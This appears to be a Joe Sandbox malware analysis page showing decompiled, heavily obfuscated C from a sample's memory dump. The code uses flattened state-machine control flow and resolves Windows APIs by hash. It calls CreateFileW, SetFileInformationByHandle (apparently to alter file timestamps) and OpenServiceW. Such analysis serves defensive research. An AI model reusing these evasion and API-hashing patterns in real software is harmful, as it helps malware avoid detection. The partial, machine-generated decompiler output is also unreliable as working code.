Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: 7a79ae32252f54e9432c81faa86bf68b0bd0f4ae41f4045e187d11c9eabf371f
Instruction ID: 5484f3998dc708a9abc983fefeb5e7cac6bca43f1aa3cb6a208d6cd5c131e443
Opcode Fuzzy Hash: 7a79ae32252f54e9432c81faa86bf68b0bd0f4ae41f4045e187d11c9eabf371f
Instruction Fuzzy Hash: 54510972B442C057C728AAB8B8447BB36A69BC0204F308DADF946C7240EA36C915D7D2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC7EC0, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 227
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02CC7EC0() {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t91;
				void* _t93;
				intOrPtr* _t95;
				void* _t97;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t109;
				intOrPtr _t113;
				intOrPtr* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				char _t131;
				intOrPtr _t136;
				unsigned int _t150;
				void* _t153;
				void* _t160;
				void* _t161;
				signed int* _t162;
				void* _t164;

				_t162 =  &_v596;
				_v592 = 0x7beb;
				_t123 = 0x139d8b99;
				_v592 = _v592 | 0x6fda154b;
				_v592 = _v592 + 0xf6a9;
				_v592 = _v592 << 0x10;
				_v592 = _v592 + 0xffffa540;
				_v592 = _v592 ^ 0x7693a440;
				_v588 = 0xc2f;
				_v588 = _v588 << 0xb;
				_t122 = 0;
				_v588 = _v588 * 0x17;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x0008c1c9;
				_v584 = 0xfdf2;
				_v584 = _v584 << 7;
				_v584 = _v584 ^ 0x007ef903;
				_v596 = 0xe94a;
				_v596 = _v596 ^ 0xa24bbed7;
				_v596 = _v596 | 0x3a5f93cf;
				_t154 = _v596;
				_t161 = _v584;
				_v596 = (_v596 - (0x2c9fb4d9 * _t154 >> 0x20) >> 1) + (0x2c9fb4d9 * _t154 >> 0x20) >> 6;
				_v596 = _v596 | 0xa489ddc5;
				_v596 = _v596 + 0xf775;
				_t150 = 0x1b4e81b5 * _v596 >> 0x20 >> 3;
				_v596 = _t150;
				_v596 = _v596 ^ 0x0235bf01;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t164 = _t123 - 0x1e3debbe;
							if(_t164 > 0) {
								break;
							}
							if(_t164 == 0) {
								_t97 = E02CC34C0(0x2ccd910);
								_t150 =  *0x2ccdc60;
								_t160 = _t97;
								if(_t150 == 0) {
									_t150 = E02CC3E80(_t122, E02CC3F20(0xe66945e6), 0xcca28b0d, _t161);
									 *0x2ccdc60 = _t150;
								}
								_t136 =  *0x2cce2ec;
								 *_t150( &_v524, 0x104, _t160, _t136 + 0x5c, _t136 + 0x278);
								_t102 =  *0x2ccdea8;
								_t162 =  &(_t162[5]);
								if(_t102 == 0) {
									_t118 = E02CC3F20(0xbb398380);
									_t150 = 0x97f883e;
									_t102 = E02CC3E80(_t122, _t118, 0x97f883e, _t161);
									 *0x2ccdea8 = _t102;
								}
								_t153 =  *_t102();
								_t104 =  *0x2cce1a0;
								if(_t104 == 0) {
									_t117 = E02CC3F20(0xbb398380);
									_t150 = 0x26c3f343;
									_t104 = E02CC3E80(_t122, _t117, 0x26c3f343, _t161);
									 *0x2cce1a0 = _t104;
								}
								 *_t104(_t153, 0, _t160);
								_t123 = 0x2eb48bb5;
								goto L1;
							} else {
								if(_t123 == 0x390f515) {
									_v580 = 0xa8c00;
									_v576 = 0;
									_v596 = E02CCB590(_v580, _v576, 0x989680, 0);
									_v592 = _t150;
									_v588 = _v588 - _v596;
									asm("sbb [esp+0x2c], ecx");
									_t123 = 0x1e3debbe;
									continue;
								} else {
									if(_t123 == 0x74c3147) {
										_t109 =  *0x2ccdc70;
										if(_t109 == 0) {
											_t109 = E02CC3E80(_t122, E02CC3F20(0xbb398380), 0x560d239b, _t161);
											 *0x2ccdc70 = _t109;
										}
										 *_t109(_t161);
										L34:
										return _t122;
									} else {
										if(_t123 != 0x139d8b99) {
											goto L22;
										} else {
											_t123 = 0x31fe4006;
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t123 == 0x2eb48bb5) {
							if( *0x2ccdfbc == 0) {
								_t93 = E02CC3F20(0xbb398380);
								_t150 = 0xc0be2284;
								 *0x2ccdfbc = E02CC3E80(_t122, _t93, 0xc0be2284, _t161);
							}
							_t91 = CreateFileW( &_v524, _v592, _v588, 0, _v584, _v596, 0); // executed
							_t161 = _t91;
							if(_t161 == 0xffffffff) {
								goto L34;
							} else {
								_t123 = 0x3a4d3f65;
								goto L2;
							}
						} else {
							if(_t123 == 0x31fe4006) {
								_t95 =  *0x2ccdfec;
								if(_t95 == 0) {
									_t121 = E02CC3F20(0xbb398380);
									_t150 = 0xd4fa8936;
									_t95 = E02CC3E80(_t122, _t121, 0xd4fa8936, _t161);
									 *0x2ccdfec = _t95;
								}
								 *_t95( &_v572);
								_t123 = 0x390f515;
								goto L2;
							} else {
								if(_t123 != 0x3a4d3f65) {
									goto L22;
								} else {
									_t113 = _v568;
									_t131 = _v572;
									_v560 = _t113;
									_v552 = _t113;
									_v544 = _t113;
									_v536 = _t113;
									_t114 =  *0x2ccdf54;
									_v564 = _t131;
									_v556 = _t131;
									_v548 = _t131;
									_v540 = _t131;
									_v532 = 0;
									if(_t114 == 0) {
										_t116 = E02CC3F20(0xbb398380);
										_t150 = 0x3d270e76;
										_t114 = E02CC3E80(_t122, _t116, 0x3d270e76, _t161);
										 *0x2ccdf54 = _t114;
									}
									 *_t114(_t161, 0,  &_v564, 0x28); // executed
									_t123 = 0x74c3147;
									_t122 =  !=  ? 1 : _t122;
									goto L2;
								}
							}
						}
						goto L35;
						L22:
					} while (_t123 != 0x21420c30);
					return _t122;
					goto L35;
				}
			}

0x02cc7ec0
0x02cc7eca
0x02cc7ed2
0x02cc7ed7
0x02cc7edf
0x02cc7ee7
0x02cc7eec
0x02cc7ef4
0x02cc7efc
0x02cc7f04
0x02cc7f0e
0x02cc7f10
0x02cc7f19
0x02cc7f1e
0x02cc7f26
0x02cc7f2e
0x02cc7f33
0x02cc7f3b
0x02cc7f43
0x02cc7f4b
0x02cc7f53
0x02cc7f59
0x02cc7f6b
0x02cc7f6f
0x02cc7f77
0x02cc7f85
0x02cc7f88
0x02cc7f8c
0x02cc7f94
0x02cc7f94
0x02cc7f94
0x02cc7fa0
0x02cc7fa0
0x02cc7fa0
0x02cc7fa0
0x02cc7fa6
0x00000000
0x00000000
0x02cc7fac
0x02cc801f
0x02cc8024
0x02cc802a
0x02cc802e
0x02cc8046
0x02cc8048
0x02cc8048
0x02cc804e
0x02cc806a
0x02cc806c
0x02cc8071
0x02cc8076
0x02cc807d
0x02cc8082
0x02cc8089
0x02cc808e
0x02cc808e
0x02cc8095
0x02cc8097
0x02cc809e
0x02cc80a5
0x02cc80aa
0x02cc80b1
0x02cc80b6
0x02cc80b6
0x02cc80bf
0x02cc80c1
0x00000000
0x02cc7fae
0x02cc7fb4
0x02cc7fd7
0x02cc7fdf
0x02cc7ffb
0x02cc7fff
0x02cc800b
0x02cc800f
0x02cc8013
0x00000000
0x02cc7fb6
0x02cc7fbc
0x02cc8200
0x02cc8207
0x02cc821a
0x02cc821f
0x02cc821f
0x02cc8225
0x02cc822a
0x02cc8233
0x02cc7fc2
0x02cc7fc8
0x00000000
0x02cc7fce
0x02cc7fce
0x00000000
0x02cc7fce
0x02cc7fc8
0x02cc7fbc
0x02cc7fb4
0x00000000
0x02cc7fac
0x02cc80d1
0x02cc81b0
0x02cc81b7
0x02cc81bc
0x02cc81ca
0x02cc81ca
0x02cc81ed
0x02cc81ef
0x02cc81f4
0x00000000
0x02cc81f6
0x02cc81f6
0x00000000
0x02cc81f6
0x02cc80d7
0x02cc80dd
0x02cc8173
0x02cc817a
0x02cc8181
0x02cc8186
0x02cc818d
0x02cc8192
0x02cc8192
0x02cc819c
0x02cc819e
0x00000000
0x02cc80e3
0x02cc80e9
0x00000000
0x02cc80eb
0x02cc80eb
0x02cc80ef
0x02cc80f3
0x02cc80f7
0x02cc80fb
0x02cc80ff
0x02cc8103
0x02cc8108
0x02cc810c
0x02cc8110
0x02cc8114
0x02cc8118
0x02cc8122
0x02cc8129
0x02cc812e
0x02cc8135
0x02cc813a
0x02cc813a
0x02cc8149
0x02cc814d
0x02cc8152
0x00000000
0x02cc8152
0x02cc80e9
0x02cc80dd
0x00000000
0x02cc815a
0x02cc815a
0x02cc8172
0x00000000
0x02cc8172

APIs

SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 02CC8149
CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 02CC81ED

Strings

e?M:, xrefs: 02CC80E3
e?M:, xrefs: 02CC81F6
Ei, xrefs: 02CC8030
{, xrefs: 02CC7ECA
J, xrefs: 02CC7F3B

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: File$CreateHandleInformation
String ID: J$e?M:$e?M:$Ei${
API String ID: 3667790775-2299002149
Opcode ID: 57d8d5dbaa337548dc044f5986f2e6b4b58cc9790c2173abafd55fea325f2aca
Instruction ID: 5c2082bd5e307e0db52bc2907c754d605bf66d7e81df5c6d98c1e9e3c0c936f5
Opcode Fuzzy Hash: 57d8d5dbaa337548dc044f5986f2e6b4b58cc9790c2173abafd55fea325f2aca
Instruction Fuzzy Hash: 6D81B171A083419FC718DF69A89462BB7E6BBC4348F204E2DF55AC7350EB71D9098F92

Uniqueness

Uniqueness Score: -1.00%

Function 02CC5070, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E02CC5070(void* __ecx, short** __edx) {
				char _v4;
				char _v8;
				short** _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v44;
				signed int _v56;
				intOrPtr _v68;
				void* __ebx;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t23;
				void* _t26;
				void* _t30;
				void* _t34;
				void* _t37;
				void* _t38;
				void* _t39;
				signed int _t40;
				void* _t48;
				short** _t81;
				void* _t83;
				signed int _t84;
				void* _t85;
				void* _t90;
				void* _t93;
				void* _t94;

				_v12 = __edx;
				_t48 = 0;
				_t81 = _v12;
				_t90 = 0;
				_v20 = __ecx;
				_t84 = 0x200c4c64;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t93 = _t84 - 0x200c4c64;
						if(_t93 > 0) {
							break;
						}
						if(_t93 == 0) {
							_t84 = 0xbb9a688;
							continue;
						} else {
							_t94 = _t84 - 0xc62322e;
							if(_t94 > 0) {
								__eflags = _t84 - 0xd366d74;
								if(_t84 == 0xd366d74) {
									_t81 =  &(_t81[0xb]);
									__eflags = _t81 - _t16;
									asm("sbb esi, esi");
									_t84 = (_t84 & 0x1131a8a6) + 0x18b16b79;
									continue;
								} else {
									__eflags = _t84 - 0x18b16b79;
									if(_t84 != 0x18b16b79) {
										goto L39;
									} else {
										E02CC4250(_t48, _t90);
										_t84 = 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									}
								}
							} else {
								if(_t94 == 0) {
									_t37 =  *0x2ccdb9c;
									__eflags = _t37;
									if(_t37 == 0) {
										_t37 = E02CC3E80(_t48, E02CC3F20(0x667fdee), 0x72841a68, _t90);
										 *0x2ccdb9c = _t37;
									}
									_t38 =  *_t37(_v20, 0, 0x30, 3, _t48, 0x20000,  &_v8,  &_v16, 0, 0);
									__eflags = _t38;
									if(_t38 == 0) {
										L29:
										_t84 = 0x18b16b79;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										_t39 =  *0x2ccdd4c;
										__eflags = _t39;
										if(_t39 == 0) {
											_t39 = E02CC3E80(_t48, E02CC3F20(0xbb398380), 0xae3c1a47, _t90);
											 *0x2ccdd4c = _t39;
										}
										_t40 =  *_t39();
										_t84 = 0x29e3141f;
										_t83 = (_t40 & 0x0000001f) * 0x2c + _t48;
										_t16 = _v56 * 0x2c + _t48;
										__eflags = _t83 - _t16;
										_v68 = _t16;
										_t81 =  >=  ? _t48 : _t83;
										continue;
									}
									L47:
								} else {
									if(_t84 == 0xc9d2df) {
										_t90 = E02CC42F0(_t48, 0x2000);
										__eflags = _t90;
										_t84 =  !=  ? 0xc62322e : 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										if(_t84 != 0xbb9a688) {
											L39:
											__eflags = _t84 - 0x230370fe;
											if(_t84 != 0x230370fe) {
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										} else {
											_t16 = E02CC42F0(_t48, 0x20000);
											_t48 = _t16;
											if(_t48 != 0) {
												_t84 = 0xc9d2df;
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L46:
						return _t16;
						goto L47;
					}
					__eflags = _t84 - 0x3024435d;
					if(__eflags > 0) {
						__eflags = _t84 - 0x34957300;
						if(_t84 == 0x34957300) {
							_t17 =  *0x2ccdea8;
							__eflags = _t17;
							if(_t17 == 0) {
								_t17 = E02CC3E80(_t48, E02CC3F20(0xbb398380), 0x97f883e, _t90);
								 *0x2ccdea8 = _t17;
							}
							_t85 =  *_t17();
							_t19 =  *0x2cce1a0;
							__eflags = _t19;
							if(_t19 == 0) {
								_t19 = E02CC3E80(_t48, E02CC3F20(0xbb398380), 0x26c3f343, _t90);
								 *0x2cce1a0 = _t19;
							}
							return  *_t19(_t85, 0, _t48);
						}
						goto L39;
					} else {
						if(__eflags == 0) {
							_t23 =  *0x2ccdd1c;
							__eflags = _t23;
							if(_t23 == 0) {
								_t23 = E02CC3E80(_t48, E02CC3F20(0x667fdee), 0xe8428d8f, _t90);
								 *0x2ccdd1c = _t23;
							}
							 *_t23(_v24, 1, _t90, 0x2000,  &_v4);
							asm("sbb esi, esi");
							_t26 =  *0x2ccddb8;
							_t84 = (_t84 & 0x1dde7ce2) + 0xd366d74;
							__eflags = _t26;
							if(_t26 == 0) {
								_t26 = E02CC3E80(_t48, E02CC3F20(0x667fdee), 0x505cb3fe, _t90);
								 *0x2ccddb8 = _t26;
							}
							_t16 =  *_t26(_v44);
							goto L39;
						} else {
							__eflags = _t84 - 0x29e3141f;
							if(_t84 == 0x29e3141f) {
								__eflags =  *0x2ccdab4;
								if( *0x2ccdab4 == 0) {
									 *0x2ccdab4 = E02CC3E80(_t48, E02CC3F20(0x667fdee), 0x203166f7, _t90);
								}
								_t30 = OpenServiceW(_v20,  *_t81, 1); // executed
								__eflags = _t30;
								_v24 = _t30;
								_t84 =  !=  ? 0x3024435d : 0xd366d74;
								continue;
							} else {
								__eflags = _t84 - 0x2b14ea56;
								if(_t84 != 0x2b14ea56) {
									goto L39;
								} else {
									_t34 =  *0x2ccdcf0;
									__eflags = _t34;
									if(_t34 == 0) {
										_t34 = E02CC3E80(_t48, E02CC3F20(0x667fdee), 0x60075e37, _t90);
										 *0x2ccdcf0 = _t34;
									}
									 *_t34(_v12, 1, _t90);
									goto L29;
								}
							}
						}
					}
					goto L46;
				}
			}

0x02cc5076
0x02cc507a
0x02cc507d
0x02cc5081
0x02cc5083
0x02cc5087
0x02cc508c
0x02cc508c
0x02cc5090
0x02cc5090
0x02cc5090
0x02cc5096
0x00000000
0x00000000
0x02cc509c
0x02cc51cd
0x00000000
0x02cc50a2
0x02cc50a2
0x02cc50a8
0x02cc5190
0x02cc5196
0x02cc51b5
0x02cc51b8
0x02cc51ba
0x02cc51c2
0x00000000
0x02cc5198
0x02cc5198
0x02cc519e
0x00000000
0x02cc51a4
0x02cc51a6
0x02cc51ab
0x02cc508c
0x02cc508c
0x00000000
0x02cc508c
0x02cc508c
0x02cc519e
0x02cc50ae
0x02cc50ae
0x02cc50fc
0x02cc5101
0x02cc5103
0x02cc5116
0x02cc511b
0x02cc511b
0x02cc513e
0x02cc5140
0x02cc5142
0x02cc522a
0x02cc522a
0x02cc508c
0x02cc508c
0x00000000
0x02cc508c
0x02cc5148
0x02cc5148
0x02cc514d
0x02cc514f
0x02cc5162
0x02cc5167
0x02cc5167
0x02cc516c
0x02cc5171
0x02cc517e
0x02cc5180
0x02cc5182
0x02cc5184
0x02cc5188
0x00000000
0x02cc5188
0x00000000
0x02cc50b0
0x02cc50b6
0x02cc50e9
0x02cc50f0
0x02cc50f7
0x02cc508c
0x02cc508c
0x00000000
0x02cc508c
0x02cc50b8
0x02cc50be
0x02cc52f5
0x02cc52f5
0x02cc52fb
0x02cc508c
0x02cc508c
0x00000000
0x02cc508c
0x02cc508c
0x02cc50c4
0x02cc50c9
0x02cc50ce
0x02cc50d2
0x02cc50d8
0x02cc508c
0x02cc508c
0x00000000
0x02cc508c
0x02cc508c
0x02cc50d2
0x02cc50be
0x02cc50b6
0x02cc50ae
0x02cc50a8
0x02cc535b
0x02cc535b
0x00000000
0x02cc535b
0x02cc51d7
0x02cc51dd
0x02cc52ed
0x02cc52f3
0x02cc5302
0x02cc5307
0x02cc5309
0x02cc531c
0x02cc5321
0x02cc5321
0x02cc5328
0x02cc532a
0x02cc532f
0x02cc5331
0x02cc5344
0x02cc5349
0x02cc5349
0x00000000
0x02cc5352
0x00000000
0x02cc51e3
0x02cc51e3
0x02cc527a
0x02cc527f
0x02cc5281
0x02cc5294
0x02cc5299
0x02cc5299
0x02cc52af
0x02cc52b3
0x02cc52b5
0x02cc52c0
0x02cc52c6
0x02cc52c8
0x02cc52db
0x02cc52e0
0x02cc52e0
0x02cc52e9
0x00000000
0x02cc51e9
0x02cc51e9
0x02cc51ef
0x02cc5239
0x02cc523b
0x02cc5253
0x02cc5253
0x02cc5260
0x02cc5262
0x02cc5264
0x02cc5272
0x00000000
0x02cc51f1
0x02cc51f1
0x02cc51f7
0x00000000
0x02cc51fd
0x02cc51fd
0x02cc5202
0x02cc5204
0x02cc5217
0x02cc521c
0x02cc521c
0x02cc5228
0x00000000
0x02cc5228
0x02cc51f7
0x02cc51ef
0x02cc51e3
0x00000000
0x02cc51dd

APIs

OpenServiceW.ADVAPI32(?,?,00000001,00000000,?,?,00000000,?,?,?,?,?,?,02CC890D), ref: 02CC5260

Strings

tm6, xrefs: 02CC5190
]C$0, xrefs: 02CC51D7
tm6, xrefs: 02CC5268
]C$0, xrefs: 02CC526D

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ]C$0$]C$0$tm6$tm6
API String ID: 3098006287-1577568632
Opcode ID: 03f9711f826718eb85de0aa8753fec377951c1ccc5818abb540457f202e15f03
Instruction ID: 59cb0ec4792accc11483fe13d81f6d0da20a86ab91f8773ecba94f9531b27949
Opcode Fuzzy Hash: 03f9711f826718eb85de0aa8753fec377951c1ccc5818abb540457f202e15f03
Instruction Fuzzy Hash: D5613B32F003519BDB14AF79AC9076E72E697C0694FB545BCE802FB244EA71ED008BD6

Uniqueness

Uniqueness Score: -1.00%

Function 02CC8240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02CC8240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x2ccdfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E02CC3F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E02CC3E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x2ccdfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x2ccde58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E02CC3F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E02CC3E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x2ccde58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E02CCB590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x2ccdfbc == 0) {
										_t101 = E02CC3F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x2ccdfbc = E02CC3E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x2cce1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E02CC3F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E02CC3E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x2cce1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x2ccdc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E02CC3F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E02CC3E80(_t112, _t108, 0x560d239b, _t145);
							 *0x2ccdc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x02cc8240
0x02cc8240
0x02cc8246
0x02cc824e
0x02cc825d
0x02cc8262
0x02cc8266
0x02cc826e
0x02cc8276
0x02cc827e
0x02cc8290
0x02cc8294
0x02cc829c
0x02cc82a4
0x02cc82ae
0x02cc82b7
0x02cc82bc
0x02cc82c4
0x02cc82cc
0x02cc82d1
0x02cc82d9
0x02cc82e1
0x02cc82e9
0x02cc82f1
0x02cc82f7
0x02cc8309
0x02cc830d
0x02cc8315
0x02cc8323
0x02cc8326
0x02cc832a
0x02cc8332
0x02cc8332
0x02cc8332
0x02cc8338
0x00000000
0x00000000
0x02cc833e
0x02cc83fc
0x02cc8401
0x02cc8403
0x02cc840a
0x02cc840f
0x02cc8416
0x02cc841b
0x02cc841b
0x02cc8425
0x02cc8427
0x00000000
0x02cc8344
0x02cc834a
0x02cc83c0
0x02cc83c5
0x02cc83c7
0x02cc83ce
0x02cc83d3
0x02cc83da
0x02cc83df
0x02cc83df
0x02cc83f0
0x02cc83f2
0x00000000
0x02cc834c
0x02cc8352
0x02cc84cf
0x02cc84d7
0x02cc84f7
0x02cc84fb
0x02cc8503
0x02cc8507
0x02cc850b
0x02cc8513
0x02cc8515
0x00000000
0x02cc8517
0x02cc8517
0x02cc851e
0x02cc852a
0x02cc8519
0x02cc8519
0x02cc851b
0x00000000
0x00000000
0x00000000
0x00000000
0x02cc851b
0x02cc8517
0x02cc8358
0x02cc835e
0x02cc84ac
0x02cc84ac
0x02cc84b2
0x00000000
0x00000000
0x00000000
0x00000000
0x02cc8364
0x02cc836c
0x02cc8373
0x02cc8378
0x02cc8386
0x02cc8386
0x02cc83a9
0x02cc83ab
0x02cc83b0
0x02cc84b8
0x02cc84b8
0x02cc84c2
0x02cc83b6
0x02cc83b6
0x00000000
0x02cc83b6
0x02cc83b0
0x02cc835e
0x02cc8352
0x02cc834a
0x00000000
0x02cc833e
0x02cc8431
0x02cc8437
0x02cc84c3
0x00000000
0x02cc843d
0x02cc843d
0x02cc8443
0x02cc8445
0x02cc844a
0x02cc844c
0x02cc8453
0x02cc8458
0x02cc845f
0x02cc8464
0x02cc8464
0x02cc8473
0x02cc8477
0x02cc8479
0x02cc8484
0x02cc848a
0x02cc848c
0x02cc8493
0x02cc8498
0x02cc849f
0x02cc84a4
0x02cc84a4
0x02cc84aa
0x02cc84aa
0x00000000
0x02cc8443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 02CC83A9

Strings

J, xrefs: 02CC82D9

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: 75e096dc8361f20c69cba6d9dae52ff375a51d1a26d254db11db4a40c60c82c4
Instruction ID: f46e0fcb4f0e9372bd37936769bbdfb163af18883fd7a0b9c5bb8dcb4bac0b6e
Opcode Fuzzy Hash: 75e096dc8361f20c69cba6d9dae52ff375a51d1a26d254db11db4a40c60c82c4
Instruction Fuzzy Hash: 9061C072A043419FC718DF68D894A2FB7E6BBC4744F248E2DF4969B280D774D9098F92

Uniqueness

Uniqueness Score: -1.00%

Function 00465280, Relevance: 352.0, APIs: 186, Strings: 14, Instructions: 2025COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,0040A810,00000011), ref: 004653FF
